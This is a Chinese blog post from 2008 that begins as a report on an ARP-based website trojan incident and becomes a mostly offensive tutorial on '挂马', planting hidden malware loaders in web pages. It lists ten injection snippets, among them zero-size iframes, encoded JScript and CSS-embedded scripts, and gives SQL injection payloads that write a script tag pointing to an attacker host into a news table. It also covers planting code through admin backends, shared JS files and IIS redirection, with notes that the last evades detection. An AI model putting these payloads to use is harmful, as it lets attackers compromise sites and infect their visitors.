1NetMedia_Blog

<< 隐藏于页面左侧的导航菜单  类别: Document SQL union和SQL union... >>
网站挂木马的方法有哪些
[ 日期: 2008-11-04 10:21:14 AM | 作者: admin | 来源: 网络收集 | 人气:6997 | 晴天 | 心情: +2 ] 字号: 【
急速栏目链接:
标签:
前日,我公司安全维护客户出现奇怪现象,服务器网站均被挂马,经过仔细的检查分析,

问题:1.整个服务器没有出现挂马相关代码,也无webshell程序。

   2.挂马代码都出现在所有页面的顶部(<HTML>标签前)。

   3.新上传页面连续刷新后,均出现挂马代码。且不是随时都出现。

  经过以上分析,判定为ARP挂马。随后我们对整个网段的机器做了检查(名气比较大的机房,就不具体说了)!所有web服务器全部被挂马。寒啊!~~~~这东西比较恐怖~~只要机房做了隔离一般没事情,或者自己下载ARP卫士。

目前此挂马方式,呈上升趋势,希望各机房网管做好隔离,防止客户受到损失!!

如果有兴趣的朋友,可以一起探讨一下!

------------------------------------------------------------------------------------------------------

ps:检查文件是否被挂马的时候可以参考下!

一:框架挂马

<iframe src=地址 width=0 height=0></iframe>

二:js文件挂马

首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>

三:js变形加密

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀
四:body挂马

<body onload="window.location='地址';"></body>

五:隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

六:css中挂马

body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}

七:JAJA挂马

<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>

八:图片伪装

<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>

九:伪装调用:

<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

十:高级欺骗

<a href="http://www.163264.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163264_com(); return true;"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

附:

数据库挂马,这里我们拿mssql数据库为例子。

  这里说的是首页调用到的数据库,比如新闻,论坛,公告,等等,一般是标题。这些需要经验去检测,举个例子,比如首页有一条新闻为:"明日开业",那么鼠标点此新闻,地址栏打开的新窗口为news.asp?id=1,这种情况,这时,就可以判断此新闻是从数据库中调用的了,当然了,我们不说access,只说mssql。
  首页,我们要有这个网站中的一个注入点,比如就点在vote.asp?id=123,同时,至少是Db_owner权限,这时如果要挂马可以不用取到webshell,因为如果我们的目的只在于挂马的话,而且有时,还得检测mssql数据库和web服务器不在同一个机器上,那挂马的方式就是更改数据库内容,这里我说的就是这种,如上面说的,首页显示的一条新闻标题为"明日开业",如果首页显示的标题是"明日开业</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>",那这样的话,首页就会执行这段代码了,像这种情况,找到了注入点,就得找表名,如此新闻的表名为news,字段为title,id,等等,根据猜测,id=1时,暴出的字段title的值就为"明日开业",那么90%就可以猜到了,首页调用的数据库的字段就为news表中的title,这时在注入点,可以大胆提交vote.asp?id=123;update news set title='明日开业</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>' where id=1;--,这样就可以更改数据库了,前提是最少要少db_owner权限,当然也有时由于代码原因,也可以这样提交:vote.asp?id=123';update news set title='明日开业</a><ifrmae src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>' where id=1 and '1'='1,也可以...
  这种方法是有问题的,实战中存在不少问题,因为一般的情况下,标题都是通过<table>来限制宽度,也就是说如果你的标题的长度超过了指定的长度,那么你的代码只能写一半,这样就不能执行了,所以挂马最好的方法是用<script>这种方法来挂马了,如:
vote.asp?id=123;update news set title='明日开业</a><script src=http://www.fucksb.net/mm.js></script>' where id=1;--长度有很大的减少,很不错。

后台挂马
通常注入等不到webshell,就只能靠进后台挂马。

这里说的是进入了后台,但不能通过后台得到webshell,这时要仔细关察后台,像比较网站的链接、顶部底部的广告、都可以直接写入你的木马代码,等等,后台是灵活的,具体问题具体分析。不过有一点很重要,是不要打乱前台htm源文件里的代码逻辑,比如应该闭合前面的<a><img>"( 等这些符号,应该先闭合掉如</a></img>")。

其它形式

如一首页调用了<iframe src=vote.asp?id=1&no=view width=100></iframe>此种形势,一样可以在vote.asp中直接写入iframe木马代码,如果调用的是<script src=vote.asp?id=1&no=view width=100></script>在vote.asp写代码时,请用document.write("")这种格式写入,当然,如果被挂文件中还有调用的文件可以继续往深处写,如果你够狠的话,直接写到数据库配置文件中,如conn.asp,这样好多页面可以同时挂上你的一种木马了。
当然这里也有js文件,一样原理。
挂一个网站的马,不一定就得攻入他,有时没有方法的同时,可以考虑跨站。好多站用了别的站的js文件,如:<script src=http://www.163.com/user.js>这种情势,这时就可以考虑只拿163.com的权限就行了,只要能修改到user.js文件就可以挂到你要挂的站点了,同理,也有<iframe src=http://www.163.com/user.htm>此种情况,一样道理,剑走偏锋,达到目的,无论用什么招数了。

服务器挂马
这里简单说一个比较狠的吧.
重定向任何调用的htm,js,等文件。
这种方法在计算中用搜索关键词是搜索不到的,反正本地怎么找也找不到。。谁能想到是在iis里设置的呢?而且调用文件那么多,怎么知道是重定向的那个文件呢?反正现在想不到有什么好方法可以解决,如果服务器如上图被挂马了,偶最好的建议是重装IIS..
   
Rss Comment  

没有相关评论

发表评论
请先注册,才能发表评论!
- 注册 -